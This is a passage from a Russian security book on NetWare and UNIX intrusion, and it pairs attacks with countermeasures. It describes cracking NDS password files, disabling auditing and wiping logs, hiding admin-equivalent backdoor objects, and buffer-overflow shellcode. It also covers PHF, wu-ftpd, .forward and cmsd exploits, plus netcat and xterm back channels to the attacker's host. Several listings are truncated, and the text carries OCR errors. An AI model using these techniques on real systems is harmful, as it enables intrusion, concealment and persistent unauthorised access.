смогли скопировать файлы NDS, можно считать, что они выполнили большую часть поставленной задачи. Сделайте все возможное, чтобы не допустить этого. Как только получены файлы NDS, взломщики, скорее всего, предпримут попытку взломать эти файлы, воспользовавшись специальными средствами. Для этого подойдет любая из свободно распространяемых программ, например IMP, разработанная Шейдом (Shade), или утилиты crypto/crypto2 из пакета Pandora. 4. Запустите утилиту crypto или crypto2 для взлома файла password.nds "в лоб" или с использованием словаря, как показано на следующем рисунке.
IMP 2.0 Программа IMP, разработанная Шейдом (Shade), имеет графический интерфейс и позволяет использовать оба режима: прямого взлома и с использованием словаря. Второй режим оказывается чрезвычайно быстрым: при использовании словаря размером 933,224 слов весь процесс на компьютере Pentium с частотой 200 МГц занимает лишь несколько минут. Единственным ограничением программы IMP является то, что пароли всех учетных записей должны иметь одну и ту же длину (к счастью, IMP рядом с именем пользователя отображает и длину пароля).
|
Редактирование журналов регистрации Профессиональные взломщики обязательно выполнят эту задачу, чтобы скрыть следы своей деятельности. Сделать это можно, отключив систему аудита, изменив время последнего обращения и модификации файлов, а также откорректировав файлы журналов. Отключение системы аудита При выполнении своих злонамеренных действий умные взломщики обязательно проверят, установлена ли система аудита, а затем отключат регистрацию определенных событий. Вот несколько шагов, которые предпримет взломщик, чтобы отключить систему аудита для службы каталогов и серверов. Изменение атрибутов файлов Если взломщик изменил файл autoexec.ncf или netinfo.cfg, то ему вряд ли захочется, чтобы об этом кому-либо стало известно. Для изменения даты последнего обращения к этим файлам прекрасно подходит утилита SYS:PUBLIC\filer. Как и команда touch систем UNIX и NT, filer — это утилита DOS, предназначенная для поиска файлов и изменения их атрибутов. Модифицировать атрибуты файла очень просто. Для этого нужно сделать следующее. |
Журналы консольных сообщений Утилита conlog.nlm предоставляет возможность записи консольных сообщений и ошибок, например о выявлении вторжений и блокировании учетных записей. Получив доступ к утилите rconsole, взломщик без проблем может ввести команду unload conlog, отключив режим регистрации сообщений в файле, а затем снова включить этот режим и возобновить запись сообщений в совершенно новый файл console.log. При этом предыдущий файл удаляется, а вместе с ним и все записанные ошибки и сообщения. Грамотный системный администратор должен рассматривать такую ситуацию как попытку взлома. К сожалению, на практике ее иногда относят к разряду необъяснимого. Контрмеры против редактирования журналов регистрации Следите за изменениями файлов console.log и sysSerr.log. Порекомендовать какие-либо простые способы защиты нельзя. Контролируйте администраторов (или взломщиков), которые знают о том, что решаемая ими задача может оказаться неразрешимой. И проверяйте содержимое файлов журналов в надежде на то, что в них найдут отражение сообщения об отключении системы аудита. "Потайные ходы" Самым эффективным "потайным ходом" системы NetWare является то, чего вы никогда не сможете добиться самостоятельно,— "осиротевшие" объекты (orphaned object). Использование скрытого объекта OU (Organizational Unit), содержащего пользователя с правами, эквивалентными администратору, и правами опекунства на свой собственный контейнер, позволит эффективно скрыть этот объект. При выполнении п. 8 будьте осторожны, поскольку после этого контейнер и созданный объект-пользователь станут невидимыми для всех пользователей, включая Admin. Администраторы не смогут увидеть или удалить этот объект. Сокрытие объекта от администратора оказывается возможным из-за того, что в дереве NDS можно отменить права supervisor для любого объекта или свойства. 9. Теперь зарегистрируйтесь с помощью только что созданного "потайного хода". Не забывайте, что в дереве вы не сможете увидеть новый контейнер. Следовательно, в процессе регистрации потребуется ввести контекст вручную, как видно на следующем рисунке. Для получения более подробной информации обратитесь на Web-узел хакерской лаборатории NMRC (Nomad Mobile Research Centre) (http://www.nmrc.org). Симпл Номад (Simple Nomad) подробно описал эту технологию в разделе Unofficial Hack FAQ по адресу http://www.nmrc.org/faqs/hackfaq/ hackfaq.html. Контрмеры против "потайныхходов" Для защиты от подобных нападений можно использовать несколько средств, как свободно распространяемых, так и коммерческих. |
Резюме Несмотря на большой путь, пройденный компанией Novell в процессе разработки надежной сетевой операционной системы, многие вопросы обеспечения безопасности оказались вне ее поля зрения. В данной главе вы увидели, насколько легко предпринять атаку на сервер NetWare, получить доступ к дереву NDS и серверу на уровне пользователей, а затем — с правами администратора. Были рассмотрены различные слабые стороны системы NetWare, а также средства, с помощью которых взломщик может получить полный контроль на всем деревом NDS. |
Глава 8. УЯЗВИМОСТЬ UNIX
|
Уязвимость UNIX Бытует мнение, что стремление получить доступ к системе UNIX в качестве пользователя root столь же неискоренимо, как наркотическая зависимость. Причина интереса к таким привилегиям уходит корнями в те времена, когда система UNIX только появилась на свет, поэтому мы предпримем небольшой исторический экскурс и напомним, как эта система возникла и как развивалась. |
root: в поисках сокровища В 1969 году Кен Томпсон (Ken Thompson), к которому несколько позднее присоединился его коллега по работе в компании AT&T Дэнис Ричи (Denis Richie), решили, что проект MULTICS (Multiplexed Information and Computing System) развивается слишком медленно. Они приняли решение "подтолкнуть" этого проект, и в результате появилась новая операционная система, названная UNIX, которая навсегда изменила мир компьютеров. Система UNIX проектировалась как развитая, производительная, многопользовательская операционная система, которая должна была показывать прекрасные результаты при выполнении программ, особенно небольших программ, названных инструментами (tool). Обеспечение безопасности не было ключевым требованием к системе, однако при правильном подходе к настройке UNIX может обеспечивать высокую степень безопасности. Популярность UNIX стала результатом ее открытости для доработок и расширений функций ядра системы, а также благодаря многочисленным небольшим инструментам, делающей эту систему столь мощной. Первые работы по созданию и развитию UNIX велись в основном в компании Bell Labs или в университетах, где безопасность обеспечивалась путем физических мероприятий. Иными словами, любой, кто имел физический доступ к системе UNIX, автоматически считался авторизованным пользователем. Очень часто защита учетной записи root с помощью пароля считалась чем-то ненужным и раздражающим, в связи с чем она отключалась. |
Краткий обзор Как вы, должно быть, помните, в главах 1-3 мы рассматривали, как идентифицировать систему, работающую под управлением UNIX, и провести инвентаризацию информации, доступной на этой системе. Для этого мы использовали средства сканирования портов, такие как nmap, позволяющие установить перечень открытых TCP/UDP портов, а также определить версию операционной системы или устройства. Для инвентаризации служб RPC и точек монтирования NFS мы использовали, соответственно, утилиты rpcinfo и showmount. Мы также использовали такую универсальную утилиту, как netcat (nc) для сбора маркеров, с помощью которых можно легко установить, какие приложения и каких версий используются на исследуемом компьютере. В этой главе мы продолжим изучение методов исследования системы UNIX. Необходимо помнить, что, прежде чем приступать к глубокому исследованию системы, необходимо провести тщательную подготовку, позволяющую получить как можно более полную картину сетевого окружения и конфигурации изучаемой системы. Сбор информации должен быть как можно более тщательным, чтобы не упустить из виду ни одной детали. Только после получения такой информации можно делать какие-то предположения о потенциальных изъянах, которые могут присутствовать в системе зашиты изучаемого компьютера. Этот процесс называется составлением схемы уязвимых мест. |
Составление схемы уязвимых мест Составление схемы уязвимых мест (vulnerability mapping) — это процесс нахождения соответствия между определенными атрибутами безопасности системы с соответствующими явными или потенциальными изъянами. Данный этап является критичным при проведении реального обследования системы, поэтому его важность нельзя недооценивать. Взломщик должен обязательно составить схему, показывающую, как атрибуты, такие как находящиеся в состоянии ожидания службы, определенные версии запущенных серверов (например, Apache 1.3.9 для HTTP и sendmail — для SMTP), архитектура системы, информация о пользовательских именах и так далее, соотносятся с потенциальными дефектами системы защиты. Для выполнения этой задачи взломщик может воспользоваться одним из следующих методов.
У каждого из этих методов имеются свои достоинства и недостатки. Однако необходимо отметить, что только взломщики с низкой квалификацией (так называемые "script kiddies" — малыши) пропускают этап составления схемы уязвимых мест, сразу же пытаясь применить к интересующей их системе первый попавшийся инструмент, не имея ни малейшего представления о том, как и почему данный инструмент может привести к получению результата. Мы нередко были свидетелями реальных попыток взлома с помощью утилит, предназначенных для использования в системе UNIX, которые применялись для проникновения в систему Windows NT. Нет необходимости говорить о том, что такие горе-взломщики сразу же выдавали свою некомпетентность и никогда не добивались желаемого результата. В следующем списке приведена последовательность операций, которые необходимо выполнить при составлении схемы уязвимых мест.
|
Удаленный и локальный доступ Остальной материал данной главы разбит на две части, первый из которых посвящен использованию удаленного доступа, а второй — локального. Удаленный доступ (remote access) определяется как доступ к системе, получаемый по сети (например, через сетевую службу, находящуюся в состоянии ожидания) или по другим коммуникационным каналам. О локальном доступе (local access) говорят в тех случаях, когда в распоряжении взломщика уже имеется интерактивный доступ к командной оболочке (command shell) или учетная запись для регистрации в системе (login). Попытки взлома при наличии локального доступа называются также атаками, направленными на расширение привилегий (privilege escalation attack). Важно понимать взаимосвязь удаленного и локального доступа. Логическая последовательность выполняемых взломщиком действий заключается в проникновении с помощью удаленного доступа, используя какой-либо изъян в защите службы, находящейся в состоянии ожидания запросов, с последующим получением локального доступа к командной оболочке. После получения интерактивного доступа к командной строке взломщик считается локальным пользователем системы. Поэтому сначала мы попытаемся логически отделить те типы взломов, которые используются для получения удаленного доступа, а затем рассмотрим соответствующие примеры. После этого мы покажем типичные методы, с помощью которых хакер, получивший удаленный доступ, может расширить свои локальные привилегии с целью сбора информации о локальной системе. Впоследствии с помощью этой информации он может попытаться расширить сферу своего влияния. Необходимо подчеркнуть, что данная глава, конечно же, не является исчерпывающим руководством по обеспечению безопасности системы UNIX. Если вам нужна более подробная информация, можно порекомендовать книгу Practical UNIX & Internet Security Симеона Гарфинкеля (Simson Garfinkel) и Джена Спаффорда (Gene Spafford). Кроме того, ограниченный объем данной главы не позволяет включить в нее описание всех возможных методов проникновения в систему UNIX, особенно с учетом всего разнообразия ее клонов и версий. Мы лишь попытаемся определить категории возможных методов взлома и изложить их теоретические основы. При появлении новых методов атак эта информация позволит быстрее разобраться, как эти методы работают, даже если в литературе вы не найдете соответствующего описания. Как видите, мы предпочитаем не просто однократно "накормить голодного", а "научить его ловить рыбу, чтобы он смог сам прокормить себя в любое время". |
Удаленный доступ Как уже говорилось выше, для удаленного доступа используется локальная сеть или какой-либо другой коммуникационный канал, такой как модемная связь с системой UNIX, выступающей в роли сервера удаленного доступа. Исходя из нашего опыта, мы можем сказать, что большинство организаций заботит именно безопасность удаленного доступа, осуществляемого по каналам аналоговой связи или ISDN. Однако мы ограничим наше исследование лишь методами получения доступа к системе UNIX по сети через протокол TCP/IP. В конце концов, протокол TCP/IP является краеугольным камнем Internet, поэтому именно эта тема заслуживает первоочередного внимания при обсужле-нии вопросов обеспечения безопасности UNIX.
В этом разделе мы рассмотрим типичные методы удаленных атак, которые подпадает под одну из приведенных выше категорий. Если вы хотите понять, как взломщику далось проникнуть в систему, попробуйте найти ответы на три следующих вопроса. Подбор паролей Обсуждение возможных методов взлома системы UNIX мы начнем с одного из самых популярных — подбора пароля путем простого перебора всех возможных вариантов, т.е. атаки "в лоб" (brute force attack). Такой подход может претить эстету хакинга, но, так или иначе, он был и остается одним из самых эффективных способов получения доступа к системе UNIX. Взлом путем перебора представляет собой не что иное, как подбор комбинации "идентификатор UID/пароль" для получения доступа к службе, которая до предоставления определенных привилегий выполняет аутентификацию пользователя. Среди самых популярных типов служб, которые чаще всего подвергаются подобным атакам можно выделить следующие.
Как вы помните из предыдущих глав, посвященных исследованию сети и инвентаризации сетевых ресурсов, одной из самых главных задач, которые необходимо решить взломщику на этом этапе, — это установить реальные идентификаторы пользователей системы. С этой целью могут использоваться такие службы, как finger, rusers и sendmail. Получив список пользовательских учетных записей, взломщик может попытаться получить доступ к интересующей его системе путем подбора пароля к одной из этих учетных записей. К сожалению, многие пользовательские учетные записи защищаются либо с помощью легко угадываемого пароля, либо вовсе не имеют пароля. Самым лучшим примером этого правила является учетная запись рядового пользователя, в которой, как правило, пользовательское имя и пароль идентичны. Чем больше пользователей имеют доступ к системе, тем больше вероятность, что в ней найдется по крайней мере один такой пользователь. Можете поверить нам на слово, на своем веку мы встречали тысячи подобных случаев, занимаясь проверкой безопасности разных компаний. Почему же это явление столь распространено? Все очень просто: во-первых, люди не задумываются о том, как нужно выбирать пароли, а во-вторых, от них никто этого не требует.
Защита от подбора паролей "в лоб" Наилучшим способом защиты от подбора пароля является использование трудно угадываемых паролей. В идеальном случае желательно использовать механизм одноразовых паролей. Существует ряд бесплатных утилит (табл. 8.1), с помощью которых решение задачи подбора пароля можно значительно затруднить. Таблица 8.1.Бесплатные утилиты, которые позволяют защититься от подбора паролей "в лоб"
Дополнительную информацию по выбору паролей можно найти в документе AusCERT SA-93:04. |
Взлом с использованием данных Обсудив "притчу во языцах" — взлом с помощью подбора паролей, — можно перейти к другому методу, также ставшему стандартом "де факто" при получении удаленного доступа. Этот метод заключается в использовании для взлома определенных данных (data driven attack), отправляемых активной службе, что позволяет получить неожиданные или нежелательные результаты. Конечно, формулировка "неожиданные или нежелательные" достаточно субъективна. Все зависит от того, кто вы — хакер или же программист, разработавший соответствующую службу. С точки зрения взломщика, результат может быть более чем желательным, поскольку в этом случае он сможет получить доступ к интересующему его компьютеру. С точки зрения же программиста, программа, получившая данные, к приему которых она не была готова, выдает нежелательные результаты. Методы взлома с использованием данных можно разделить на две категории: атака путем переполнения буфера и взлом при отсутствии проверки ввода. В последующих подразделах каждая из этих категорий будет рассмотрена более подробно. Взлом путем переполнения буфера В ноябре 1996 года подходы к компьютерной безопасности изменились раз и навсегда. Ведущий списка рассылки Bugtraq Алеф Ван (Aleph One) опубликовал в номере 49 журнала Phrack Magazine, посвященного вопросам безопасности, статью под названием "Разрушение стека для развлечения и извлечения выгоды" (Smashing The Stack For Fun And Profit). Эта статья произвела колоссальный эффект на состояние дел в сфере обеспечения безопасности, поскольку в ней очень ясно показано, как практика некачественного программирования может привести к нарушению безопасности путем переполнения буфера. Первые упоминания об использовании этой методологии датируются 1988 годом в связи с нашумевшим делом о сетевом черве Роберта Морриса (Robert Morris), однако полезной информации о ее конкретных подробностях не было вплоть до 1996 года. char shellcode[]= "\xeb\xlf\x5e\x89\x76\x08\x31\xcO\ Очевидно, что взлом с помощью переполнения буфера чрезвычайно опасен. Достаточно сказать, что он не раз использовался во многих успешных попытках получения несанкционированного доступа. Приведенный выше пример очень прост. На самом деле работающий код создать очень трудно. Однако зачастую изобретать велосипед не приходится: множество таких "яиц" уже было создано хакерами и помещено в Internet. Описание деталей процесса создания "яйца" выходит за рамки этой книги, поэтому мы советуем познакомиться с упоминавшейся выше статьей хакера Алефа Вана в журнале Phrack Magazine. Если вы хотите улучшить свои навыки написания ассемблерного кода, прочтите книгу Криса Дрейка (Chris Drake) и Кимберли Браун (Kimberley Brown) Panic — UNIX System Crash and Dump Analysis. Кроме того, группа программистов и специалистов по безопасности Тесо (Teso) разработала несколько утилит, которые позволяют автоматически генерировать подобный код. Эти средства можно найти по адресу http://teso.scene.at/releases.php. Контрмеры: защита от атак с использованием переполнения буфера
Практика безопасного кодирования Лучшим методом зашиты от переполнения буфера является практика кодирования, учитывающего все требования обеспечения безопасности. Хотя на практике невозможно спроектировать и запрограммировать систему таким образом, чтобы в ней не было ни одной ошибки, существуют подходы, способные минимизировать вероятность возникновения переполнения буфера. Среди таких рекомендаций можно выделить следующие.
Тестирование и аудит каждой программы Очень важно выполнять тестирование и аудит каждой программы. Очень часто случается, что программисты даже не задумываются о том, может ли в их программе возникнуть ошибка переполнения буфера. Однако всегда найдется кто-нибудь, кто не только задумается над этим, но и приложит все усилия для того, чтобы найти такие ошибки и воспользоваться ими в своих целях. Одним из лучших примеров тестирования и аудита кода UNIX является проект OpenBSD (www.openbsd.org), которым руководит Тео де Раадт (Theo de Raadt). Программисты, работающие над проектом OpenBSD, постоянно проверяют и перепроверяют исходный код друг друга и уже исправили сотни ошибок, которые могут привести к переполнению буфера, не говоря уже о более серьезных проблемах, имеющих отношение к безопасности. Именно из-за столь грамотного подхода к тщательному аудиту, применяемого разработчиками OpenBSD, эта операционная система заслужила репутацию одной из самых надежных из свободно распространяемых версий UNIX. Отключение неиспользуемых или потенциально опасных служб На протяжении этой главы мы будем возвращаться много раз к этому вопросу. Если какие-то неиспользуемые или потенциально опасные службы не являются жизненно необходимыми для работы системы UNIX, отключите их. Помните, что ни один злоумышленник не может проникнуть в систему через неработающую службу. Кроме того, мы настоятельно рекомендуем использовать TCP-оболочки (tcpd) и xinetd (http://www. synack.net/xinetd/) для того, чтобы можно было применить избирательные списки управления доступом на уровне служб, а также воспользоваться дополнительным возможностями регистрации событий. Конечно, не к каждой службе можно применить оболочку. Однако применение этого средства лишь к некоторым службам может значительно повысить защищенность вашей системы. Кроме того, оцените возможность использования режима фильтрации пакетов на уровне ядра, поддержка которого уже стала стандартной для большинства бесплатных операционных систем UNIX (например, ipchains или netf liter для Linux, ipf для BSD). Хорошие рекомендации по использованию ipchains для обеспечения безопасности можно найти по адресу http://www.linuxdoc.org/HOWTO/IPCHAINS-HOWTO.html. Пакет ipf Даррена Рида (Darren Reed) является одним из лучших и может быть добавлен во многие версии системы UNIX. Для получения об этом пакете более подробной информации обращайтесь по адресу http: //www.obfuscation. rg/ ipf / ipf-howto. html. Отключение режима поддержки выполнения стека Некоторые радетели чистоты нередко прибегают даже к отключению режима поддержки выполнения стека (stack execution), чтобы обеспечить защиту каждой программы от взлома с помощью переполнения буфера. Хотя такое решение может привести к некоторым побочным эффектам, в большинстве систем оно все же обеспечивает защиту от скрытого использования уязвимых мест. Для Linux имеется модуль обновления, позволяющий отключить режим поддержки выполнения стека, который можно применять в системах с ядром версий 2.0.x и 2.2.x Первым разработал такой модуль хакер Solar Desinger (http://www.false.com). Этот модуль обновления, ценный в основном для программистов, можно найти по адресу http: //www. openwall. com/linux/. Взлом при отсутствии проверки ввода В 1996 году Дженифер Майерс (Jennifer Myers) идентифицировал ставший впоследствии широко известным изъян PHF. Хотя атаки с использованием этого изъяна уже отошли в прошлое, на его примере очень хорошо видно, как может осуществляться взлом при отсутствии проверки ввода (input validation attack). Если вы разберетесь в основном механизме этого метода, то сможете применить полученные знания и к другим подобным подходам. В данной главе мы не будем посвящать много времени этой теме, поскольку она подробно рассматривается в главе 15. Наша цель — лишь показать, что из себя представляет взлом при отсутствии проверки ввода и как с его помощью злоумышленник может получить доступ к системе UNIX.
PHF— это сценарий CGI (Common Gateway Interface— интерфейс общего шлюза), ставший стандартом в ранних версиях Web-сервера Apache и сервера HTTPD центра NCSA (National Center for Supercomputing Applications — Национальный центр суперкомпьютерных приложений). К сожалению, эта программа не в состоянии ни правильно провести синтаксический анализ входных данных ни проверить их пригодность. Исходная версия сценария PHF принимала символ новой строки (%0а) и выполняла следующие за ним команды с привилегиями пользователя, запустившего Web-сервер. Поэтому сразу же был изобретен метод взлома PHF, показанный ниже. Контрмеры Как уже упоминалось раньше, одним из лучшим способов превентивной защиты является разработка программ с учетом требований обеспечения безопасности. Это же правило можно в полной мере применить и к защите от описанного выше взлома. Абсолютно необходимо, чтобы программы и сценарии воспринимали только те данные, которые они должны воспринимать. В разделе часто задаваемых вопросов WWW Security, расположенном по адресу http://www.w3.org/Security/Faq/www-security-faq.html, содержится важная информация о том, как сделать защищенными программы CGI. Поскольку очень трудно выполнять проверку каждой порции входных данных, лучше, чтобы эти процедуры по умолчанию отбрасывали все критические данные. Кроме того, после компиляции тщательно контролируйте и тестируйте весь программный код. |
Интерактивный доступ к командной оболочке Обсудив два основных метода получения доступа к системе UNIX, необходимо поговорить и об методах, используемых для получения доступа к командной оболочке (shell account access). Необходимо помнить, что основной целью любого взломщика является получение доступа к командной строке или к командной оболочке интересующей его системы. Традиционный метод получения интерактивного доступа к командной оболочке заключается в удаленной регистрации на сервере UNIX с помощью таких программ, как telnet, rlogin или ssh. Кроме того, можно выполнять команды, используя утилиты rsh, ssh, или rexec, не проходя этапа удаленной регистрации. У вас может возникнуть вопрос — а что, если все службы, поддерживающие удаленный доступ, отключены или заблокированы на уровне брандмауэра? Может ли в этом случае взломщик получить доступ к командной оболочке целевой системы? Хороший вопрос. Давайте рассмотрим один пример, на котором можно исследовать различные методы, с помощью которых взломщик может получить интерактивный доступ к командной оболочке UNIX. Эти методы иллюстрируются на рис. 8.1.
Предположим, что взломщик пытается получить доступ к Web-серверу, работающему под управлением операционной системы UNIX, который находится в сегменте так называемой "демилитаризованной зоны" (DMZ) — небольшой сети, размешенной за промышленным маршрутизатором или брандмауэром, защищающим внутреннюю сеть. Тип и модель брандмауэра или маршрутизатора не имеют особого значения. Важно лишь понимать, что такое устройство относится к классу маршрутизирующих брандмауэров, которые не выполняют функций сервера-посредника ни для одной из служб. Предположим, что единственные службы, которая поддерживается брандмауэром, — это HTTP (порт 80) и HTTP поверх SSL (HTTPS) (порт 443). Теперь предположим, что Web-сервер не может противостоять попыткам взлома, например, основанным на изъяне PHF. Кроме того, пусть Web-сервер работает на уровне привилегий пользователя nobody, что является широко распространенной практикой и считается хорошим решением с точки зрения безопасности. Таким образом, если взломщику удастся проникнуть на Web-сервер, используя недостатки в обработке ввода PHF, он сможет выполнять код на сервере с уровнем привилегий пользователя nobody. Это, конечно, важно, но возможность запуска выполняемого кода — лишь первый шаг в получении интерактивного доступа к командной оболочке. Операции в системе X После того как взломщик получил возможность выполнять команды на Web-сервере, используя недостатки в реализации PHF, первым из методов, которыми он воспользуется для получения интерактивного доступа к командной оболочке, будет применение средств X Window системы UNIX (далее — просто X). X — это система оконного интерфейса, которая позволяет разным программам использовать один и тот же графический дисплей. Система X чрезвычайно устойчива и позволяет поддерживающим ее клиентным программам отображать свои результаты на локальном или на удаленном сервере X (с использованием портов 6000-6063). Один из самым удобных для взломщика инструментов в этом случае является клиентная программа xterm. Эта программа предназначена для запуска локальной командной оболочки, работающей под управлением X. Однако, применив параметр -display, взломщик может перенаправить командную оболочку на сервер X собственного компьютера. Вот так — быстро и просто. Реверсивный сеанс telnet и обратные каналы Безусловно, программа xterm представляет собой самое простое средство получения контроля над системой UNIX. Однако как быть в том случае, если об этом знает не только злоумышленник, но и администратор, удаливший систему X? Эта мера, конечно же, повысит безопасность системы UNIX, но одной ее недостаточно, так как в распоряжении потенциального взломщика остается еще много других методов получения несанкционированного доступа. Одним из таких методов, в частности, является создание обратных каналов. В данном случае термин обратный канал (back channel) применяется для описания механизма, с помощью которого коммуникационный канал создается по направлению от взламываемого узла к компьютеру взломщика, а не наоборот, как при использовании обычных коммуникационных каналов. Нужно напомнить, что в рассматриваемом примере взломщик не может получить интерактивный доступ к командной оболочке обычным способом, так как все порты, кроме 80 и 443, блокируются брандмауэром. Таким образом, злоумышленник должен добиться того, чтобы взламываемый сервер инициировал сеанс с его компьютером, т.е. создать обратный канал. [tsunami]! nc -I -n -v -p 80 Прежде чем запускать утилиту пс, убедитесь, что в вашей системе с входящими портами 8 С и 25 не связано никаких служб, находящихся в режиме ожидания запросов, например HTTPD или sendmail. Если такие службы имеются, необходимо завершить выполнение соответствующих процессов с помощью команды kill, чтобы освободить требуемые порты для утилиты пс. Параметр -1 означает, что утилиту пс необходимо запустить в режиме ожидания запросов; параметр -v включает режим вывода подробной информации; параметр -n указывает, что IP-адреса не нужно преобразовывать в имена узлов, а параметр -р определяет порт, который будет прослушиваться. Контрмеры: защита от попыток создания обратных каналов Противостоять попыткам создания обратного канала очень трудно. Самой лучшей превентивной мерой является применение всех средств обеспечения безопасности, что позволит устранить возможность использования подобного метода. К таким мерам относятся отключение ненужных служб и применение всех модулей обновления сразу же после их появления.
|
Часто используемые методы удаленного взлома Хотя мы не сможем описать все возможные методы удаленного взлома, однако, как нам кажется, у вас уже должно было выработаться общее представление об основных принципах подобных атак, на основании которого вы сможете самостоятельно разобраться в тех или иных конкретных методах. Перед завершением обсуждения методов удаленного взлома мы хотим рассмотреть несколько важных служб, часто подвергающимся таким атакам, а также указать, с помощью каких контрмер можно снизить риск использования этих служб для проникновения в систему в тех случаях, когда отключение службы не представляется возможным. TFTP Протокол TFTP (Trivial File Transfer Protocol — простой протокол передачи файлов) обычно используется для загрузки бездисковых рабочих станций или сетевых устройств. таких как маршрутизаторы. TFTP — это основанный на UDP протокол, который использует порт 69 и характеризуется очень низким уровнем безопасности. Практически каждый случай, когда взломщик встречает систему, на которой запущен сервер TFTP, заканчивается попыткой получения через TFTP копии файла /etc/passwd. Если сервер TFTP не настроен должным образом, это приводит к тому, что система без малейшего сопротивления позволяет скопировать этот файл. Тем самым в руки взломщика попадает файл с информацией о пользовательских именах, после чего он может попробовать подобрать пароль. Кроме того, если пароли не хранятся в файле /etc/shadow, то, помимо пользовательских имен, взломщик получает также и зашифрованные пароли, в результате чего им может быть предпринята попытка их взлома или подбора. Контрмеры: защита TFTP Убедитесь в том, что сервер TFTP ограничивает доступ к определенным каталогам, таким как /tftpboot. Это воспрепятствует взломщикам получить важную информацию о конфигурации системы. Кроме того, рассмотрите возможность реализации механизма управления доступом на уровне всей сети в целом и на уровне отдельных узлов, который запрещал бы несанкционированный доступ к серверу TFTP. FTP В настоящее время протокол FTP (File Transfer Protocol), позволяющий обмениваться файлами с удаленными системами, является одним из наиболее популярных. Это одна из причин, по которым он часто используется для несанкционированного доступа к удаленным системам или скрытной записи файлов. Многие FTP-серверы разрешают анонимный доступ, т.е. позволяют подключаться любому пользователю без какой-либо аутентификации. Обычно при этом файловая система, доступная анонимному пользователю, ограничивается определенными каталогами. Однако иногда бывает так, что анонимный пользователь может получить доступ к любому каталогу и файлу системы. Такая оплошность системного администратора дает возможность взломщику найти важные конфигурационные файлы, прежде всего /etc/passwd. Что еще хуже, многие FTP-серверы позволяют всем пользователям записывать информацию в свои каталоги. Такая "гремучая смесь" является "миной замедленного действия", подложенной под систему защиты. Например, взломщик может поместить файл .rhosts в личный каталог пользователя, чтобы впоследствии подключиться к системе с помощью утилиты rlogin. Кроме того, многие FTP-серверы взломаны охотниками за программным обеспечением, которые помешают нелегальные программы в скрытых каталогах. Поэтому, если нагрузка на вашу сеть возрастет за день в три раза, это может служить косвенным признаком того, что вашу систему используют для копирования очередной пиратской копии. [thunder]# wugod -t 192.168.1.10 -sO Подобная атака оказывается поистине смертельной. Анонимного доступа к уязвимому FTP-серверу, который поддерживает выполнение определенных команд, вполне достаточно, чтобы получить доступ с правами root. Контрмеры: защита FTP Хотя протокол FTP очень полезен, необходимо помнить, что разрешение анонимного доступа к FTP-серверу может весьма пагубно сказаться на "самочувствии" вашего сервера. Оцените необходимость использования FTP-сервера и определите, нужно ли предоставлять возможность анонимного доступа. В таких случаях для защиты сервера необходимо предпринять специальные меры. Очень важно установить самые последние версии модулей обновления, а также запретить или как минимум oipami-чить количество каталогов, в которые разрешена запись всем пользователям. А лучше вовсе откажитесь от таких каталогов. sendmail Данная тема столь обширна, что вполне заслуживает отдельной книги. С чего же начать? Программа sendmail — это агент рассылки электронной почты (МТА — mail transfer agent), используемый во многих системах UNIX. Из всех программ UNIX sendmail, пожалуй, является самой "вредной". Она обладает очень широким набором функций, в связи с чем позволяет настраивать свои параметры самыми разными способами и является очень сложной в использовании. Фактически о первых попытках взлома sendmail стало известно еще в 1988 году и с тех пор ее использовали для получения несанкционированного доступа к нескольким тысячам систем. Одно время была даже популярной такая шутка: "Какая ошибка в sendmail признана лучшей ошибкой недели?" В течение последних лет sendmail была значительно улучшена в плане безопасности, но она по-прежнему остается очень большой программой, исходный код которой содержит более 80000 строк. Таким образом, вероятность обнаружения новых изъянов в системе зашиты по-прежнему достаточно велика. hello Помимо универсальных методов, направленных на переполнение буфера или взлом при отсутствии проверки ввода, для получения несанкционированного доступа часто применяются средства, специфичные для sendmail. Например, одним из распространенных методов является создание или модификация пользовательского файла -/.forward с применением FTP или NFS при условии, конечно, что у взломщика имеется доступ для записи в рабочий каталог этого пользователя. В файле -/.forward обычно содержатся сведения о том, куда нужно перенаправлять почтовые сообщения или какие программы нужно запускать при ее поступлении. Очевидно, что для взломщика этот файл представляет собой "лакомый кусочек", а его модификация открывает перед злоумышленником весьма богатые возможности. Давайте рассмотрим пример того, что взломщик может добавить в файл ~/.forward выбранной им жертвы. [tsunami]$ cat > .forward Создав такой файл, взломщик помещает его в соответствующий пользовательский каталог взламываемой системы (естественно, при условии, что у него имеется право записи в этот каталог). Затем ему остается лишь отправить почту по адресу жертвы. [tsunami]$ echo hello chump | mail gk@targetsystem.com Контрмеры: защита программы sendmail Лучшим методом защиты от попыток взлома sendmail является отказ от ее использования во всех случаях, когда эта программа не используется для получения почты по сети. Если использовать sendmail все же необходимо, обязательно убедитесь в том, что в вашем распоряжении имеется ее самая свежая версия, в которой установлены все модули обновления системы защиты (http://www.sendmail.org). К другим мерам относится удаление из соответствующего файла всех псевдонимов. Исследуйте каждый псевдоним, который указывает на программу, а не на учетную запись пользователя. Кроме того, убедитесь, что разрешения, заданные для соответствующих файлов, запрещают внесение в них каких-либо изменений. Службы удаленного вызова процедур (RPC) Удаленный вызов процедур (RPC — Remote Procedure Call) — это механизм, который позволяет программе, работающей на одном компьютере, выполнять программный код на удаленном компьютере. Одна из первых реализаций службы RPC была разработана компанией Sun Microsystems и использовалась в системе, базирующейся на протоколе XDR (внешнее представление данных — eXtemal Data Representation). Целью этой системы было обеспечение взаимодействия сетевой информационной службы (NIS — Network Information System) и сетевой файловой системы (NFS — Network File System), созданных компанией Sun. После разработки компанией Sun Microsystems службы RPC многие другие производители операционных систем семейства UNIX также стали включать поддержку RPC в свои продукты. С точки зрения обеспечения взаимодействия распространение и стандартизация RPC — это очень важно и полезно. Однако при разработке службы RPC вопросам безопасности практически не уделялось никакого внимания. Несмотря на то что и компания Sun, и другие разработчики приложили все усилия, для того, чтобы устранить имеющиеся недостатки в уже используемом программном обеспечении и выпустить соответствующие модули обновления, нередко оказывается, что механизм RPC по-прежнему таит в себе немало проблем, связанных с огромным количеством ошибок в системе защиты. [rumble]* cmsd.sh quake Как показано ниже, эту атаку позволяет упростить простой сценарий оболочки, в котором вызывается утилита cmsd. При этом необходимо знать имя удаленного узла. В рассматриваемом примере таким именем является quake. Кроме того, используется также IP-адрес этого узла, 192.168.1.11, а также тип системы (2), что эквивалентно системе Solaris 2.6. Эта информация оказывается чрезвычайно важной, поскольку утилита "приспосабливается" к каждой конкретной системе. И наконец, мы указали также IP-адрес компьютера взломщика (192 .168 .1.103) и установили обратный канал с использованием программы xterm (рис. 8.2).
#!/bin/sh
